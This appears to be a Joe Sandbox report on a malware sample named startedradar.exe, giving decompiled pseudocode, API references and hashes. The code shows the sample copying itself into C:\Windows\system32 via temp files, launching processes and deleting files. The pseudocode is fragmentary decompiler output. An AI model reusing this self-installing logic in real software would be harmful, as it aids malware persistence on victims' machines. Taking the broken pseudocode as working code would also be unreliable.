C-Code - Quality: 39%

			E001111F3(void* __edi) {
				void* __esi;
				void* _t14;
				void* _t17;
				void* _t19;
				void* _t21;

				_t17 = __edi;
				GetModuleFileNameW(??, ??, ??);
				_push(_t21 - 0x18);
				_push(0x80);
				if(L00111E80(_t19) != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					CloseHandle( *(_t21 - 0x18));
					CloseHandle( *(_t21 - 0x14));
				}
				CloseHandle(_t19);
				CloseHandle(_t14);
				return _t17;
			}

0x001111f3
0x001111f3
0x001111fc
0x001111fd
0x00111212
0x00111217
0x00111220
0x00111229
0x00111229
0x00111230
0x00111237
0x00111245

APIs

GetModuleFileNameW.KERNEL32 ref: 001111F3
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00111217
CloseHandle.KERNEL32(?), ref: 00111220
CloseHandle.KERNEL32(?), ref: 00111229
CloseHandle.KERNEL32 ref: 00111230
CloseHandle.KERNEL32 ref: 00111237

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: e7f6c8ebf42bd4a323663686596f0369699ce9e887142826a818d5b760cc997b
Instruction ID: f6897585a04ff105c770620dbf2783fe063448b38e7947f397027c64c7a94f07
Opcode Fuzzy Hash: e7f6c8ebf42bd4a323663686596f0369699ce9e887142826a818d5b760cc997b
Instruction Fuzzy Hash: 31E0C033601019FBCB116BE4EC499DDBF39EB54612F104562FA15D15A0DB3145E68F61

Uniqueness

Uniqueness Score: 0.01%

Function 000F2F8A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97windowCOMMON

APIs

LoadIconA.USER32 ref: 000F2FE3
LoadImageA.USER32 ref: 000F30AA

Strings

MainMenu, xrefs: 000F3036
MainWClass, xrefs: 000F3030
0, xrefs: 000F2FA3

Memory Dump Source

Source File: 00000009.00000002.1910243505.000F0000.00000040.sdmp, Offset: 000F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f0000_startedradar.jbxd

Similarity

API ID: Load$IconImage
String ID: 0$MainMenu$MainWClass
API String ID: 666102371-1064549320
Opcode ID: c25ebf9f950ae9a2ce910f9ee57ea336e570cb205e64e3e7abdbbd1ca5c8fb28
Instruction ID: 3f5144880060dcfa1247995dfe3fedace56dec1203eed5068613a3b68df74235
Opcode Fuzzy Hash: c25ebf9f950ae9a2ce910f9ee57ea336e570cb205e64e3e7abdbbd1ca5c8fb28
Instruction Fuzzy Hash: 3841F5B0D003188FEB14DFA9E84539EBBF4FB48304F10852AE919AB754D779A909CF91

Uniqueness

Uniqueness Score: 3.75%

Function 00111E91, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38
processCOMMON

C-Code - Quality: 48%

			E00111E91(WCHAR* __esi) {
				int _t11;
				void* _t20;

				memset();
				 *(_t20 - 0x58) = 0x44;
				_t11 = CreateProcessW(__esi, 0, 0, 0, 0,  *(_t20 + 8), 0, 0, _t20 - 0x58, _t20 - 0x10);
				if(_t11 == 0) {
					goto 0x3005fe;
					asm("int3");
					return _t11;
				} else {
					if( *((intOrPtr*)(_t20 + 0xc)) == 0) {
						CloseHandle( *(_t20 - 0x10));
						CloseHandle( *(_t20 - 0xc));
						return 1;
					} else {
						asm("movdqu xmm0, [ebp-0x10]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x00111e91
0x00111e9a
0x00111eb9
0x00111ec1
0x00111ef9
0x00111efe
0x00111eff
0x00111ec3
0x00111ec8
0x00111ee0
0x00111ee9
0x00111ef8
0x00111eca
0x00111eca
0x00111ecf
0x00111edc
0x00111edc
0x00111ec8

APIs

memset.NTDLL ref: 00111E91
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00111EB9
CloseHandle.KERNEL32(?), ref: 00111EE0
CloseHandle.KERNEL32(?), ref: 00111EE9

Strings

D, xrefs: 00111E9A

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: a0c4a512d151a244660bc99b09dd9107b072a5c86a0eda058331951ecc0b59fb
Instruction ID: af5396c2dc8db22b032b2dc99597439f8ae6ddbc14f8328461ad9852af98c178
Opcode Fuzzy Hash: a0c4a512d151a244660bc99b09dd9107b072a5c86a0eda058331951ecc0b59fb
Instruction Fuzzy Hash: 5EF06D32A41249BBEF214FD8EC05BEDBB78FB04700F104566FE04A96D0E7B695E18B94

Uniqueness

Uniqueness Score: 0.08%

Function 0011FBF6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27
UNIQUE

C-Code - Quality: 28%

			E0011FBF6(void* __ecx, void* __edi, short __esi) {
				int _t38;
				void* _t41;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t50;

				_t42 = __edi;
				_t40 = __ecx;
				GetTempPathW(??, ??);
				GetTempFileNameW(_t47 - 0x228, 0, 0, _t47 - 0x228);
				memset(_t47 - 0x20, 0, 0x1e);
				_t50 = _t49 + 0xc;
				 *((intOrPtr*)(_t47 - 0x1c)) = 1;
				 *((intOrPtr*)(_t47 - 0x18)) = 0x127ee0;
				 *((intOrPtr*)(_t47 - 0x14)) = _t47 - 0x228;
				 *((short*)(_t47 - 0x10)) = __esi;
				if(SHFileOperationW(_t47 - 0x20) == 0 &&  *((intOrPtr*)(_t47 - 0xe)) == __edi) {
					goto 0x301dba;
					asm("int3");
					asm("int3");
					memset();
					_t50 = _t50 + 0xc;
					 *((intOrPtr*)(_t47 - 0x1c)) = 1;
					 *((intOrPtr*)(_t47 - 0x18)) = 0x1283f8;
					 *((intOrPtr*)(_t47 - 0x14)) = 0x127ee0;
					 *((short*)(_t47 - 0x10)) = __esi;
					_t38 = SHFileOperationW(_t47 - 0x20);
					if(_t38 != 0 ||  *((intOrPtr*)(_t47 - 0xe)) != __edi) {
						_t40 = _t47 - 0x228;
						_t42 = 0;
						L001112F0(_t38, _t47 - 0x228, _t41);
					} else {
						_t16 = _t38 + 1; // 0x1
						_t42 = _t16;
					}
				}
				goto 0x301de2;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("popfd");
				asm("int3");
				_t45 = L00111D00(_t40, _t41, _t42);
				 *0x1259dc(_t47 - 0x430, 0x104, _t45, "C:\Windows\system32\startedradar.exe");
				HeapFree(GetProcessHeap(), 0, _t45);
				DeleteFileW(_t47 - 0x430);
				return _t42;
			}

APIs

GetTempPathW.KERNEL32 ref: 0011FBF6
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0011FC08
memset.NTDLL ref: 0011FC16
SHFileOperationW.SHELL32(?), ref: 0011FC3E

Strings

C:\Windows\system32\startedradar.exe, xrefs: 0011FC2C

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: FileTemp$NameOperationPathmemset
String ID: C:\Windows\system32\startedradar.exe
API String ID: 1645034579-941650888
Opcode ID: 003ccc7bf307fa9e6f4e6291d79d3133be2eb3fa192504c07b15a57e6644ea05
Instruction ID: 096a3d3ab78451f16fe28560d4ace825e8bc30875f32a1a5f056afeb51e817fe
Opcode Fuzzy Hash: 003ccc7bf307fa9e6f4e6291d79d3133be2eb3fa192504c07b15a57e6644ea05
Instruction Fuzzy Hash: 91F0177084120DEBDF208B90DC48BEEBBB8BB04355F100466E505A6590E77496958B95

Uniqueness

Uniqueness Score: 100.00%

Function 001200CE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
processCOMMON

C-Code - Quality: 61%

			E001200CE() {
				int _t11;
				void* _t13;

				memset();
				 *(_t13 - 0x60) = 0x44;
				_t11 = CreateProcessW(_t13 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x60, _t13 - 0x18);
				if(_t11 != 0) {
					CloseHandle( *(_t13 - 0x18));
					_t11 = CloseHandle( *(_t13 - 0x14));
				}
				goto 0x301f61;
				asm("int3");
				return _t11;
			}

0x001200ce
0x001200d7
0x001200fb
0x00120103
0x00120108
0x00120111
0x00120111
0x00120117
0x0012011c
0x0012011d

APIs

memset.NTDLL ref: 001200CE
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001200FB
CloseHandle.KERNEL32(?), ref: 00120108
CloseHandle.KERNEL32(?), ref: 00120111

Strings

D, xrefs: 001200D7

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: 78cc9b935960d274a9f067a94e16556b01f6d0c8a55b027f4e3f58e50cecf705
Instruction ID: ee2ae1b0e0ef5ee62fa1489641aa8158e9f617882178a5701e13fc9a2225b22e
Opcode Fuzzy Hash: 78cc9b935960d274a9f067a94e16556b01f6d0c8a55b027f4e3f58e50cecf705
Instruction Fuzzy Hash: 41E0927280411DEBDF159BE0DC4DAEEBB7DBF04705F000525E206E65A0DB3589A6CF61

Uniqueness

Uniqueness Score: 0.08%

Function 00120304, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
processCOMMON

C-Code - Quality: 61%

			E00120304() {
				int _t11;
				void* _t13;

				memset();
				 *(_t13 - 0x60) = 0x44;
				_t11 = CreateProcessW(_t13 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x60, _t13 - 0x14);
				if(_t11 != 0) {
					CloseHandle( *(_t13 - 0x14));
					_t11 = CloseHandle( *(_t13 - 0x10));
				}
				goto 0x302048;
				asm("int3");
				return _t11;
			}

0x00120304
0x0012030d
0x00120331
0x00120339
0x0012033e
0x00120347
0x00120347
0x0012034d
0x00120352
0x00120353

APIs

memset.NTDLL ref: 00120304
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00120331
CloseHandle.KERNEL32(?), ref: 0012033E
CloseHandle.KERNEL32(?), ref: 00120347

Strings

D, xrefs: 0012030D

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: 06ac977326c13405c5016098c596c5cfefaf82146cc52ee1c412212267ef2ff5
Instruction ID: 270e47dc31caa8ceada806639ce0eed710c0acc5542938a9c45b3a0b97697e54
Opcode Fuzzy Hash: 06ac977326c13405c5016098c596c5cfefaf82146cc52ee1c412212267ef2ff5
Instruction Fuzzy Hash: 36E09A7280411DEFDF119BD0DC4CBAE7B79BB04705F104925E205E6460DB3589A5CF61

Uniqueness

Uniqueness Score: 0.08%

Function 0011FCAD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25
memoryfileUNIQUE

C-Code - Quality: 39%

			E0011FCAD(void* __edi, void* __esi) {
				void* _t11;
				void* _t12;
				void* _t16;
				void* _t18;

				asm("popfd");
				asm("int3");
				_t16 = L00111D00(_t11, _t12, __edi);
				 *0x1259dc(_t18 - 0x430, 0x104, _t16, "C:\Windows\system32\startedradar.exe");
				HeapFree(GetProcessHeap(), 0, _t16);
				DeleteFileW(_t18 - 0x430);
				return __edi;
			}

0x0011fcad
0x0011fcae
0x0011fcb4
0x0011fcc8
0x0011fcdb
0x0011fce8
0x0011fcf5

APIs

_snwprintf.NTDLL ref: 0011FCC8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011FCD4
HeapFree.KERNEL32(00000000), ref: 0011FCDB
DeleteFileW.KERNEL32(?), ref: 0011FCE8

Strings

C:\Windows\system32\startedradar.exe, xrefs: 0011FCBC

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$DeleteFileFreeProcess_snwprintf
String ID: C:\Windows\system32\startedradar.exe
API String ID: 3158849725-941650888
Opcode ID: 84904df7fa01dc4accc9e57a692ae1a41025758fe2207ee55888b66bb1c23190
Instruction ID: a8991918b165e2bdda2a762c0800292d22fa6328ccef9a80e2bed2564651705a
Opcode Fuzzy Hash: 84904df7fa01dc4accc9e57a692ae1a41025758fe2207ee55888b66bb1c23190
Instruction Fuzzy Hash: 95E0D871600214B7CB2067E4AC4EB9F371DEB0036BF040591F709D6440C57045A187A0

Uniqueness

Uniqueness Score: 100.00%

Function 0011FB9A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
UNIQUE

C-Code - Quality: 19%

			E0011FB9A(void* __ecx) {
				void* __edi;
				int _t51;
				void* _t54;
				int _t55;
				void* _t58;
				void* _t60;
				void* _t62;
				void* _t63;

				_t53 = __ecx;
				memset(??, ??, ??);
				L00111250();
				memset(_t60 - 0x20, _t55, 0x1e);
				_t63 = _t62 + 0x18;
				 *((intOrPtr*)(_t60 - 0x1c)) = 1;
				 *((intOrPtr*)(_t60 - 0x18)) = 0x1283f8;
				 *((intOrPtr*)(_t60 - 0x14)) = 0x127ee0;
				 *((short*)(_t60 - 0x10)) = 0xe14;
				if(SHFileOperationW(_t60 - 0x20) != 0 ||  *((intOrPtr*)(_t60 - 0xe)) != _t55) {
					goto 0x301da0;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					GetTempPathW();
					GetTempFileNameW(_t60 - 0x228, 0, 0, _t60 - 0x228);
					memset(_t60 - 0x20, 0, 0x1e);
					_t63 = _t63 + 0xc;
					 *((intOrPtr*)(_t60 - 0x1c)) = 1;
					 *((intOrPtr*)(_t60 - 0x18)) = 0x127ee0;
					 *((intOrPtr*)(_t60 - 0x14)) = _t60 - 0x228;
					 *((short*)(_t60 - 0x10)) = 0xe14;
					if(SHFileOperationW(_t60 - 0x20) == 0 &&  *((intOrPtr*)(_t60 - 0xe)) == _t55) {
						goto 0x301dba;
						asm("int3");
						asm("int3");
						memset();
						_t63 = _t63 + 0xc;
						 *((intOrPtr*)(_t60 - 0x1c)) = 1;
						 *((intOrPtr*)(_t60 - 0x18)) = 0x1283f8;
						 *((intOrPtr*)(_t60 - 0x14)) = 0x127ee0;
						 *((short*)(_t60 - 0x10)) = 0xe14;
						_t51 = SHFileOperationW(_t60 - 0x20);
						if(_t51 != 0 ||  *((intOrPtr*)(_t60 - 0xe)) != _t55) {
							_t53 = _t60 - 0x228;
							_t55 = 0;
							L001112F0(_t51, _t60 - 0x228, _t54);
						} else {
							_t23 = _t51 + 1; // 0x1
							_t55 = _t23;
						}
					}
				}
				goto 0x301de2;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("popfd");
				asm("int3");
				_t58 = L00111D00(_t53, _t54, _t55);
				 *0x1259dc(_t60 - 0x430, 0x104, _t58, "C:\Windows\system32\startedradar.exe");
				HeapFree(GetProcessHeap(), 0, _t58);
				DeleteFileW(_t60 - 0x430);
				return _t55;
			}

0x0011fb9a
0x0011fb9a
0x0011fba0
0x0011fbac
0x0011fbb2
0x0011fbb5
0x0011fbbf
0x0011fbcb
0x0011fbd2
0x0011fbdf
0x0011fbea
0x0011fbef
0x0011fbf0
0x0011fbf1
0x0011fbf2
0x0011fbf3
0x0011fbf4
0x0011fbf5
0x0011fbf6
0x0011fc08
0x0011fc16
0x0011fc1c
0x0011fc1f
0x0011fc2c
0x0011fc33
0x0011fc39
0x0011fc46
0x0011fc4d
0x0011fc52
0x0011fc53
0x0011fc54
0x0011fc5a
0x0011fc5d
0x0011fc67
0x0011fc6e
0x0011fc75
0x0011fc7a
0x0011fc82
0x0011fc93
0x0011fc99
0x0011fc9b
0x0011fc89
0x0011fc89
0x0011fc89
0x0011fc89
0x0011fc82
0x0011fc46
0x0011fca0
0x0011fca5
0x0011fca6
0x0011fca7
0x0011fca8
0x0011fca9
0x0011fcaa
0x0011fcab
0x0011fcac
0x0011fcad
0x0011fcae
0x0011fcb4
0x0011fcc8
0x0011fcdb
0x0011fce8
0x0011fcf5

APIs

memset.NTDLL ref: 0011FB9A
memset.NTDLL ref: 0011FBAC
SHFileOperationW.SHELL32(?), ref: 0011FBD7

Strings

C:\Windows\system32\startedradar.exe, xrefs: 0011FBCB
C:\Windows\system32\startedradar.exe, xrefs: 0011FBBF

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: memset$FileOperation
String ID: C:\Windows\system32\startedradar.exe$C:\Windows\system32\startedradar.exe
API String ID: 1137840942-1437733430
Opcode ID: f986dc82196e9f7f29d70ba07fb6ed170d1226dd1963309fac19d60faec59b75
Instruction ID: 30c6cbf75c29e2f82994a7bd3a1a317441d324af7dc353b614faa12be56fa46c
Opcode Fuzzy Hash: f986dc82196e9f7f29d70ba07fb6ed170d1226dd1963309fac19d60faec59b75
Instruction Fuzzy Hash: A4E03970C02219EBCF24DF90DC48AEEBAB8BF00398FA00429E501B6540D7748695CBA6

Uniqueness

Uniqueness Score: 100.00%

Function 00120500, Relevance: 7.6, APIs: 5, Instructions: 51
memorysynchronizationCOMMON

C-Code - Quality: 79%

			E00120500() {
				void* _t7;
				int _t8;
				void* _t18;
				void* _t19;

				_t19 =  *0x126d5c; // 0x0
				_t18 = 0x126d5c;
				if(_t19 != 0) {
					do {
						_t8 =  *(_t19 + 8);
						if(_t8 == 1 || _t8 == 2) {
						}
						if(_t8 != 3) {
							L8:
							if(0 == 0) {
								_t18 = _t19;
								goto L11;
							}
							goto L9;
						} else {
							_t8 = WaitForSingleObject( *(_t19 + 0x14), 0);
							if(_t8 != 0) {
								goto L8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t19 + 0x10))))( *(_t19 + 0xc), _t8, _t8);
							VirtualFree( *(_t19 + 0xc), 0, 0x8000);
							CloseHandle( *(_t19 + 0x14));
							L9:
							 *_t18 =  *_t19;
							_t8 = HeapFree(GetProcessHeap(), 0, _t19);
						}
						L11:
						_t19 =  *_t18;
					} while (_t19 != 0);
					return _t8;
				}
				return _t7;
			}

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00120530
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0012054E
CloseHandle.KERNEL32(?), ref: 00120557
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0012056A
HeapFree.KERNEL32(00000000), ref: 00120571

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: d3dbd114b98a19bc05809b229dab450536da56751eac4a2b88d7a10a3db617ac
Instruction ID: 5c9e058c73c6e6a74103e8fce218e55b0051cabdd75edba88fbb77607fc7e4a5
Opcode Fuzzy Hash: d3dbd114b98a19bc05809b229dab450536da56751eac4a2b88d7a10a3db617ac
Instruction Fuzzy Hash: 9B010031500620EFDB324B94BC84B26BBB9EF18721B254A15F942D79B1C7619CB19F50

Uniqueness

Uniqueness Score: 0.02%

Function 00112597, Relevance: 7.5, APIs: 5, Instructions: 36memoryCOMMON

APIs

WideCharToMultiByte.KERNEL32 ref: 00112597
GetProcessHeap.KERNEL32 ref: 001125B6
HeapFree.KERNEL32(00000000), ref: 001125BD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001125D5
HeapFree.KERNEL32(00000000), ref: 001125DC

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess$ByteCharMultiWide
String ID:
API String ID: 2131386014-0
Opcode ID: 49e7a418c558a33b430bce818e09a66fd5fdf8d4b5e84728e30175abf6e6b011
Instruction ID: e51034e31904fb795da96ad60462257cd792141336e3e4fc6aeb2bc619b1678a
Opcode Fuzzy Hash: 49e7a418c558a33b430bce818e09a66fd5fdf8d4b5e84728e30175abf6e6b011
Instruction Fuzzy Hash: 8EF03031605215EFC7684FB498996BD7765AF04312B150465E802D7A50D73188B19B61

Uniqueness

Uniqueness Score: 3.75%

Function 0011119A, Relevance: 7.5, APIs: 5, Instructions: 36memoryCOMMON

APIs

_snwprintf.NTDLL ref: 001111B3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001111BF
HeapFree.KERNEL32(00000000), ref: 001111C6
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 001111D9
CloseHandle.KERNEL32 ref: 00111237

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$CloseCreateEventFreeHandleProcess_snwprintf
String ID:
API String ID: 347592444-0
Opcode ID: bb036452dec92399ba16f9573ddf98ce861df54f2d521d1f694a86adf63e6952
Instruction ID: 08ff2de19acc3c71e01e23883f23093939d31aae3da07f9cdb8b106a7d0fea2b
Opcode Fuzzy Hash: bb036452dec92399ba16f9573ddf98ce861df54f2d521d1f694a86adf63e6952
Instruction Fuzzy Hash: 77F02E72A01114B7DB3017F46C4DBDEBB2CDB04753F0004A2FB0DE6581D67189E58791

Uniqueness

Uniqueness Score: 3.75%

Function 00116A8C, Relevance: 7.5, APIs: 6, Instructions: 14
memoryCOMMON

C-Code - Quality: 50%

			E00116A8C(intOrPtr* __ebx, void* __edi) {
				void* _t31;
				void* _t34;

				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), 0, _t31);
				HeapFree(GetProcessHeap(), 0,  *(_t34 - 8));
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				if( *__ebx == 0) {
					 *(__edi + 0x1c) =  *(__edi + 0x1c) + 1;
					return 0 |  *__ebx != 0x00000000;
				} else {
					 *((intOrPtr*)(__edi + 0x20)) =  *((intOrPtr*)(__edi + 0x20)) + 1;
					 *(__edi + 0x1c) = 0;
					return 0 |  *__ebx != 0x00000000;
				}
			}

0x00116a93
0x00116aa3
0x00116ab5
0x00116ac7
0x00116ad9
0x00116ae2
0x00116afc
0x00116b0c
0x00116ae4
0x00116ae4
0x00116ae9
0x00116afb
0x00116afb

APIs

GetProcessHeap.KERNEL32 ref: 00116A8C
HeapFree.KERNEL32(00000000), ref: 00116A93
GetProcessHeap.KERNEL32(00000000), ref: 00116A9C
HeapFree.KERNEL32(00000000), ref: 00116AA3
GetProcessHeap.KERNEL32(00000000,?), ref: 00116AAE
HeapFree.KERNEL32(00000000), ref: 00116AB5

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 40288306c04dd9548de6cad1a29bd458ab9ddf5f045b50ca12e14cadc88fd51f
Instruction ID: 74312e87141aa049faf586dc78783c09b53b3e53d9a1b872ae40eb2f1e5001c5
Opcode Fuzzy Hash: 40288306c04dd9548de6cad1a29bd458ab9ddf5f045b50ca12e14cadc88fd51f
Instruction Fuzzy Hash: 2CD0CE72549B04FBD7611BF0AD8DB6D3E3ABB09703F450444F206C58E1CA7745B29B22

Uniqueness

Uniqueness Score: 0.01%

Function 0012012A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
memoryUNIQUE

C-Code - Quality: 100%

			E0012012A(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

				 *__edi =  *__edi + __ecx;
			}

0x0012012f

APIs

_snwprintf.NTDLL ref: 00120160
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0012016E
HeapFree.KERNEL32(00000000), ref: 00120175

Strings

C:\Windows\system32\startedradar.exe, xrefs: 00120154

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess_snwprintf
String ID: C:\Windows\system32\startedradar.exe
API String ID: 1826127215-941650888
Opcode ID: f6a3f5e6f26fac8dff5e1f88a6c642442847e6d671fa21ce2c10a77f80990a46
Instruction ID: f362fb516cee9e3994270479b12514e26e5cd740ed1f61fe3be916ea41337b03
Opcode Fuzzy Hash: f6a3f5e6f26fac8dff5e1f88a6c642442847e6d671fa21ce2c10a77f80990a46
Instruction Fuzzy Hash: 68E02B72506311BBC73157A57C0FBAB7B59EF403A2F100A9AF90DC6881D77184758791

Uniqueness

Uniqueness Score: 100.00%

Function 0011FC54, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17UNIQUE

APIs

memset.NTDLL ref: 0011FC54
SHFileOperationW.SHELL32(?), ref: 0011FC7A

Strings

C:\Windows\system32\startedradar.exe, xrefs: 0011FC6E
C:\Windows\system32\startedradar.exe, xrefs: 0011FC67

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: FileOperationmemset
String ID: C:\Windows\system32\startedradar.exe$C:\Windows\system32\startedradar.exe
API String ID: 1721435463-1437733430
Opcode ID: a9f3325afee85a19715fd6ec9727b1c8389aee6b6d30ea3d36650ab2a5185b28
Instruction ID: 541d7c4c562bf87184788db351dff9e6d0f9d24cda2d61759bea31db429a260c
Opcode Fuzzy Hash: a9f3325afee85a19715fd6ec9727b1c8389aee6b6d30ea3d36650ab2a5185b28
Instruction Fuzzy Hash: 50E04F30805209DBCF28CF8095086FE7BB9FF04394F600429C80176550D7715699DFD2

Uniqueness

Uniqueness Score: 100.00%

Function 00111140, Relevance: 6.0, APIs: 4, Instructions: 33memorysynchronizationCOMMON

APIs

_snwprintf.NTDLL ref: 00111159
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00111165
HeapFree.KERNEL32(00000000), ref: 0011116C
